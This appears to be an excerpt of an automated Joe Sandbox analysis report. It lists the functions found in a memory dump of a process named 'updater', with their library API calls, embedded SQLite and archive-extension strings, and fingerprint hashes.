CreateSemaphoreExW, xrefs: 0140CF39
CloseThreadpoolTimer, xrefs: 0140CF7D
CompareStringEx, xrefs: 0140D126
WakeConditionVariable, xrefs: 0140D06B
CloseThreadpoolWork, xrefs: 0140D115

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: a0db52fea9f806f0aa0490ea486e98aec7284e29cce65e9da28f5592e7d86c2c
Instruction ID: db6f24b10ea93d7098b96ef86a915770b2f4edd8d43a49d250a075b48fc9c875
Opcode Fuzzy Hash: a0db52fea9f806f0aa0490ea486e98aec7284e29cce65e9da28f5592e7d86c2c
Instruction Fuzzy Hash: 6461DCF6941761BBD3319FB6F84E88ABAB8BB4C743310050BF255C217ADBB580849F50

Uniqueness

Uniqueness Score: -1.00%

Function 0140AC8A Relevance: 46.8, APIs: 31, Instructions: 287COMMONLIBRARYCODE

Download Yara Rule

APIs

collate.LIBCPMT ref: 0140AC9A

Part of subcall function 014099C6: __EH_prolog3_GS.LIBCMT ref: 014099CD
Part of subcall function 014099C6: __Getcoll.LIBCPMT ref: 01409A31

__Getcoll.LIBCPMT ref: 0140ACE0
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140ACF4
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AD09
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AD5A
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AE8F
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AEA2
int.LIBCPMT ref: 0140AEAF
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AEBF
int.LIBCPMT ref: 0140AECC
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AEDC
int.LIBCPMT ref: 0140AEE9
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AEF9
int.LIBCPMT ref: 0140ACBA

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

int.LIBCPMT ref: 0140AD1D
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AD47
int.LIBCPMT ref: 0140AD72
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140ADA0
int.LIBCPMT ref: 0140ADAD
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140ADD4
int.LIBCPMT ref: 0140ADE1
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AE31
int.LIBCPMT ref: 0140AE3E
int.LIBCPMT ref: 0140AF11
numpunct.LIBCPMT ref: 0140AF38
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AF48
int.LIBCPMT ref: 0140AF55
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AF8C
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AF9F
int.LIBCPMT ref: 0140AFAC
std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AFBC

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$H_prolog3_Lockit::_Lockit::~_collatenumpunct
String ID:
API String ID: 4289308570-0
Opcode ID: ada5920da3f550dea45ea34b3d04d7cb4dd06dee2a69c35d828b1e0c4e7dabfe
Instruction ID: 16dc1e2179519862427654d416aba98937a61dc9c7acaf16c2c8aafdaaacdea0
Opcode Fuzzy Hash: ada5920da3f550dea45ea34b3d04d7cb4dd06dee2a69c35d828b1e0c4e7dabfe
Instruction Fuzzy Hash: 2591E7B1D013136BE7566FBB4C44A7FBAA4FF71654F14452EFA4DA72E1EA30890082A1

Uniqueness

Uniqueness Score: -1.00%

Function 01416BA0 Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01416C0F
_free.LIBCMT ref: 01416C25
_free.LIBCMT ref: 01416C38
_free.LIBCMT ref: 01416C4D
_free.LIBCMT ref: 01416C62
GetCPInfo.KERNEL32(?,?), ref: 01416CAC

Part of subcall function 01424D02: _free.LIBCMT ref: 01424D6D

_free.LIBCMT ref: 01416F17
_free.LIBCMT ref: 01416F2A
_free.LIBCMT ref: 01416F38
_free.LIBCMT ref: 01416F43
_free.LIBCMT ref: 01416F85
_free.LIBCMT ref: 01416F8D
_free.LIBCMT ref: 01416F93
_free.LIBCMT ref: 01416F9B
_free.LIBCMT ref: 01416FA9

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: eff325af69f1a7633f172cc6b6f5a81cc1c3ca65845c97e37387734d14ff534e
Instruction ID: 9832b08c1a0e1aed228f7e8ce155c8404fcdb71865625283f306788a7a9f42b6
Opcode Fuzzy Hash: eff325af69f1a7633f172cc6b6f5a81cc1c3ca65845c97e37387734d14ff534e
Instruction Fuzzy Hash: 35D1DE71D003169FEB21CFA9C880BAEBBF5FF18300F54406EE595A73A5DBB5A9418B50

Uniqueness

Uniqueness Score: -1.00%

Function 013E972D Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 299COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013E99FA

Part of subcall function 013EDA52: _strlen.LIBCMT ref: 013EDB9D

Part of subcall function 013E88F3: _strlen.LIBCMT ref: 013E8929

_strlen.LIBCMT ref: 013E9A37

Strings

CREATE TABLE %Q.sqlite_sequence(name,seq), xrefs: 013E9996
VIEW, xrefs: 013E9833, 013E9917
CREATE %s %.*s, xrefs: 013E9918
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d, xrefs: 013E995F
TABLE, xrefs: 013E982E
view, xrefs: 013E983B
tbl_name='%q', xrefs: 013E99A6
sqlite_master, xrefs: 013E993E
sqlite_temp_master, xrefs: 013E994D, 013E9958

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: CREATE %s %.*s$CREATE TABLE %Q.sqlite_sequence(name,seq)$TABLE$UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d$VIEW$sqlite_master$sqlite_temp_master$tbl_name='%q'$view
API String ID: 4218353326-3984390951
Opcode ID: 5022bc8dc97d572e2c7dbbe0701f267e17ccfcda40d0cddbc548fe62f7c41662
Instruction ID: e24cec038a038d48a09e7577e29816f626261e4ec7c7d72802c24b3a443a45bb
Opcode Fuzzy Hash: 5022bc8dc97d572e2c7dbbe0701f267e17ccfcda40d0cddbc548fe62f7c41662
Instruction Fuzzy Hash: 62B19E70A00316AFEF14DFA8D884BAEBBF5FF44308F10815DE909AB281D771A944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0142931A Relevance: 18.4, APIs: 12, Instructions: 374COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01429362
_free.LIBCMT ref: 01429386
_free.LIBCMT ref: 01429393
_free.LIBCMT ref: 014293B8
_free.LIBCMT ref: 014293C5
_free.LIBCMT ref: 014293CE
_free.LIBCMT ref: 014296A9
_free.LIBCMT ref: 014296B1

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a47d74ab5b98f03490607271375902689e914a9a21c838d0f4a82d3a1352f2d3
Instruction ID: 574da1d825a1c90974353c8e5845178c06173b5c9e90f76d630524fd79e1b68a
Opcode Fuzzy Hash: a47d74ab5b98f03490607271375902689e914a9a21c838d0f4a82d3a1352f2d3
Instruction Fuzzy Hash: 9DC14572D41225AFDB20DBA9DC86FEE77F8EF28704F54016AFA04EB291D6709D818750

Uniqueness

Uniqueness Score: -1.00%

Function 013DD212 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 168COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013DD324
_strlen.LIBCMT ref: 013DD350

Strings

vtab:%p:%p, xrefs: 013DD248
collseq(%.20s), xrefs: 013DD2D8
%lld, xrefs: 013DD272
%.16g, xrefs: 013DD260
,nil, xrefs: 013DD3AC
,..., xrefs: 013DD3DD
keyinfo(%d, xrefs: 013DD316
%s(%d), xrefs: 013DD2F8

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: %.16g$%lld$%s(%d)$,...$,nil$collseq(%.20s)$keyinfo(%d$vtab:%p:%p
API String ID: 4218353326-1567635944
Opcode ID: 8db8d33a4992a44d4d34ba9343a2fc74234d5ae46f288ca6adc1257ca2883746
Instruction ID: 53ed0fd8025a337be43a182803f9826f366c377d31615652d71bf856ad46b5f5
Opcode Fuzzy Hash: 8db8d33a4992a44d4d34ba9343a2fc74234d5ae46f288ca6adc1257ca2883746
Instruction Fuzzy Hash: E2510472900605AFEB15CFEDE880E6A7BB4BF4532CF24429AE5119F2E2D731D942CB51

Uniqueness

Uniqueness Score: -1.00%

Function 013B7521 Relevance: 16.7, APIs: 11, Instructions: 184fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?), ref: 013B7535
GetFileSize.KERNEL32(?,00000000,?,?), ref: 013B75B5
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 013B75CC
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 013B75DF
SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?), ref: 013B75EC
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 013B75FF
SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?), ref: 013B7620
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 013B7633

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-0
Opcode ID: 15060bc7f69422e1472d6cd784dda5fd10b1ce3db857315551876cb88dbe62f4
Instruction ID: aa9c53b73fcdba36f94f23bbdde107007f0eee6495c859b1828d136cbe1b1b01
Opcode Fuzzy Hash: 15060bc7f69422e1472d6cd784dda5fd10b1ce3db857315551876cb88dbe62f4
Instruction Fuzzy Hash: 305164B5A00219BFEB24DE68DC81FBEB7F9EB84714F104529FA45E7280E630DD008B60

Uniqueness

Uniqueness Score: -1.00%

Function 014113F0 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 014114EB
type_info::operator==.LIBVCRUNTIME ref: 01411512
___TypeMatch.LIBVCRUNTIME ref: 0141161E
IsInExceptionSpec.LIBVCRUNTIME ref: 014116F9
_UnwindNestedFrames.LIBCMT ref: 01411780
CallUnexpected.LIBVCRUNTIME ref: 0141179B

Strings

csm, xrefs: 01411549
csm, xrefs: 01411498
csm, xrefs: 0141142B

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 403eaa091ceed871cab725fe7f5a3ff7378107f9e00de8aebcd9689b2a3acf29
Instruction ID: b0af0003ae8d21e9cd72ac6acdcb6e97ecf4040e6a2f41f54535f64079eb0626
Opcode Fuzzy Hash: 403eaa091ceed871cab725fe7f5a3ff7378107f9e00de8aebcd9689b2a3acf29
Instruction Fuzzy Hash: B3C18871D0020A9FCF26DFA9D9809AFBBB4AF14B10F04445BEA156B32AD331D952CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01420383 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01420399

Part of subcall function 01420123: HeapFree.KERNEL32(00000000,00000000), ref: 01420139
Part of subcall function 01420123: GetLastError.KERNEL32(?,?,0141DA9C), ref: 0142014B

_free.LIBCMT ref: 014203A5
_free.LIBCMT ref: 014203B0
_free.LIBCMT ref: 014203BB
_free.LIBCMT ref: 014203C6
_free.LIBCMT ref: 014203D1
_free.LIBCMT ref: 014203DC
_free.LIBCMT ref: 014203E7
_free.LIBCMT ref: 014203F2
_free.LIBCMT ref: 01420400

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dda267a50077e33c45978a1d260a09a79bfb975c6b5354d800f691c0a20acc8e
Instruction ID: d61d0bcba2975cef03f8219580331509d2d5b4f65956c6eaaa6e7979eb2db56b
Opcode Fuzzy Hash: dda267a50077e33c45978a1d260a09a79bfb975c6b5354d800f691c0a20acc8e
Instruction Fuzzy Hash: 8A21B676904129AFCF01EF95D890DEE7BF8BF28240B5051AAF5159B131DB72EA84CB80

Uniqueness

Uniqueness Score: -1.00%

Function 013E706C Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 218COMMON

Download Yara Rule

APIs

Part of subcall function 013E8615: _strlen.LIBCMT ref: 013E865A

Part of subcall function 013E86CA: _strlen.LIBCMT ref: 013E871F

_strlen.LIBCMT ref: 013E710B

Strings

sqlite_, xrefs: 013E7118
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;, xrefs: 013E7282
sqlite_sequence, xrefs: 013E7249
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q, xrefs: 013E7238
UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q, xrefs: 013E7261
sqlite_master, xrefs: 013E722C, 013E7234
sqlite_temp_master, xrefs: 013E7221

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q$UPDATE %Q.sqlite_sequence set name = %Q WHERE name = %Q$UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;$sqlite_$sqlite_master$sqlite_sequence$sqlite_temp_master
API String ID: 4218353326-1520438555
Opcode ID: 717db15a86e9adbe06971112fb94a6cdfe349e04ad5b1a08230f024b0f7f34f9
Instruction ID: c36b33f561f77178860c194a3f7eb15592f5cd0d0e2767f4827a71325fc2865d
Opcode Fuzzy Hash: 717db15a86e9adbe06971112fb94a6cdfe349e04ad5b1a08230f024b0f7f34f9
Instruction Fuzzy Hash: 0061C731F00326ABDF14ABA9DC44A6EB7F6AF94218F244069E901A73D5DB30DD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013E9581 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 154COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013E95B6
_strlen.LIBCMT ref: 013E9640
_strlen.LIBCMT ref: 013E9695
_strlen.LIBCMT ref: 013E96DD

Strings

CREATE TABLE , xrefs: 013E962A, 013E9632
, xrefs: 013E9674, 013E9681
, , xrefs: 013E95EF
CREATE TEMP TABLE , xrefs: 013E9625

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: $, $CREATE TABLE $CREATE TEMP TABLE
API String ID: 4218353326-108156782
Opcode ID: 99a79c97c3028ea6a1a31688f49b4427beb66e50cee076ee2d8df565d52506e7
Instruction ID: 50bc3e0fa0e0d045def2e743ca335a771008636dd2ae2d8dc1e03fcf09839f1f
Opcode Fuzzy Hash: 99a79c97c3028ea6a1a31688f49b4427beb66e50cee076ee2d8df565d52506e7
Instruction Fuzzy Hash: 4E512C71E00216AFDF14DFACC884A9EBBF5FF58218B15446AD409EB255E730AE05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01402731 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 01402738
_Maklocstr.LIBCPMT ref: 014027A1
_Maklocstr.LIBCPMT ref: 014027B3
_Maklocchr.LIBCPMT ref: 014027CB
_Maklocchr.LIBCPMT ref: 014027DB
_Getvals.LIBCPMT ref: 014027FD

Part of subcall function 013FB678: _Maklocchr.LIBCPMT ref: 013FB6A7
Part of subcall function 013FB678: _Maklocchr.LIBCPMT ref: 013FB6BD

Strings

true, xrefs: 014027AE
false, xrefs: 0140279C

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 3549167292-2658103896
Opcode ID: 949364c3ec99f845f8f9b8c6ace595b1fd53645fd5070b1051238e65ef258e8e
Instruction ID: 0e71468782a0580dd70523903c2ab002e6983d86983c20737e2819bc06cfce6b
Opcode Fuzzy Hash: 949364c3ec99f845f8f9b8c6ace595b1fd53645fd5070b1051238e65ef258e8e
Instruction Fuzzy Hash: 372191B2D00254ABDF15EFA9D845ECEBB68EF14610F10801FFA08AF291DBB08540CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 013B740E Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 78COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013B7413

Strings

.tgz, xrefs: 013B74AA
.zip, xrefs: 013B7444
.arc, xrefs: 013B7466
.arj, xrefs: 013B7488
.gz, xrefs: 013B7499
.zoo, xrefs: 013B7455
.lzh, xrefs: 013B7477

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 4218353326-51310709
Opcode ID: 1ffe729f472f5cb27d2b0c25f280b3b1918fd01e0c1a3ff00f346fae8c49c5de
Instruction ID: 09d839b948d3509631312a7bac4c3f125b008d580ce852146c396cd58adc2750
Opcode Fuzzy Hash: 1ffe729f472f5cb27d2b0c25f280b3b1918fd01e0c1a3ff00f346fae8c49c5de
Instruction Fuzzy Hash: 8D114236249F3325B655612F6C89ADB3E888DE343A3A4801FDB08B49D5FF6CA5434179

Uniqueness

Uniqueness Score: -1.00%

Function 0142973A Relevance: 13.7, APIs: 9, Instructions: 200COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 014297A8
_free.LIBCMT ref: 014297B4
_free.LIBCMT ref: 014298DD
_free.LIBCMT ref: 014298E8

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 0e9aa8b570002df678390a20a192a485d4b51cc0809da75dc9ca1e6390feef6a
Instruction ID: ce14295e8bf5034aa066f9fd23c074257f73bdd29496f17f2c2fe8ad98171562
Opcode Fuzzy Hash: 0e9aa8b570002df678390a20a192a485d4b51cc0809da75dc9ca1e6390feef6a
Instruction Fuzzy Hash: 2861D471900336EFD721DF69C880BAB77E9EF54710F94402BE555EB261EBB09981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0140280A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 01402811
_Maklocstr.LIBCPMT ref: 01402878
_Maklocstr.LIBCPMT ref: 0140288A
_Maklocchr.LIBCPMT ref: 014028A2
_Maklocchr.LIBCPMT ref: 014028B2

Strings

true, xrefs: 01402885
false, xrefs: 01402873

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: MaklocchrMaklocstr$H_prolog3_
String ID: false$true
